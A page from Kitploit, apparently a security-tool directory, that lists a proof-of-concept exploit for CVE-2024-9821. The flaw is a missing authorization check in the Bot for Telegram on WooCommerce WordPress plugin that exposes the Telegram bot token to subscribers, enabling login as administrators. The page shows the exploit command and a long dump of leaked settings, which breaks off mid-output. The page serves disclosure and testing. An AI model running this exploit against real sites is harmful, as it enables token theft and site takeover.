Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-9821 — Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-9821
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubrandomrobbiebf/cve-2024-9821

CVE-2024-9821

Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass

View Repository
191 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-9821

Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass

Description

The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature.

Type: plugin
CVSS Score: 8.8
CVE: CVE-2024-9821
  • Slug: bot-for-telegram-on-woocommerce
  • Download Link: Download bot-for-telegram-on-woocommerce Version 1.2.4

POC

python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
{   'bot_settings': {   'fields': {   'bftow_bot_api': {   'label': 'Telegram '
                                                                    'Bot Token',
                                                           'type': 'text',
                                                           'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'},
                                      'bftow_bot_name': {   'description': 'Set '
                                                                           'if '
                                                                           'you '
                                                                           'want '
                                                                           'user '
                                                                           'to '
                                                                           'get '
                                                                           'back '
                                                                           'to '
                                                                           'Telegram '
                                                                           'after '
                                                                           'successful '
                                                                           'checkout. '
                                                                           '(Without '
                                                                           '&quot;@&quot;)',
                                                            'label': 'Telegram '
                                                                     'Bot Name',
                                                            'type': 'text',
                                                            'value': 'Superbotman'},
                                      'bftow_buttons': {   'description': 'Save '
                                                                          'BOT '
                                                                          'Token '
                                                                          'first',
                                                           'label': 'Activate '
                                                                    'API URL',
                                                           'type': 'bftow_webhook_activation',
                                                           'value': ''},
                                      'bftow_google_maps_api_key': {   'description': '<a '
                                                                                      'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide '
                                                                                      'Google '
                                                                                      'Maps '
                                                                                      'API '
                                                                                      'key</a> '
                                                                                      'with '
                                                                                      'enabled '
                                                                                      'geocoding '
                                                                                      'API '
                                                                                      'and '
                                                                                      'configured '
                                                                                      'billing '
                                                                                      'account. '
                                                                                      'If '
                                                                                      'you '
                                                                                      'leave '
                                                                                      'this '
                                                                                      'field '
                                                                                      'empty, '
                                                                                      'the '
                                                                                      'location '
                                                                                      'will '
                                                                                      'be '
                                                                                      'taken '
                                                                                      'via '
                                                                                      'openstreetmap',
                                                                       'label': 'Google '
                                                                                'Maps '
                                                                                'API '
                                                                                'key',
                                                                       'pro': True,
                                                                       'type': 'text',
                                                                       'value': ''},
                                      'bftow_proxy_server': {   'label': 'Proxy '
                                                                         'server',
                                                                'type': 'text',
                                                                'value': 'https://api.telegram.org/bot'}},
                        'name': 'BOT API Settings'},
    'interface_settings': {   'fields': {   'bftow_cart_on_site': {   'description': 'if '
                                                                                     'enabled '
                                                                                     'and '
                                                                                     'the '
                                                                                     'checkout '
Download Tool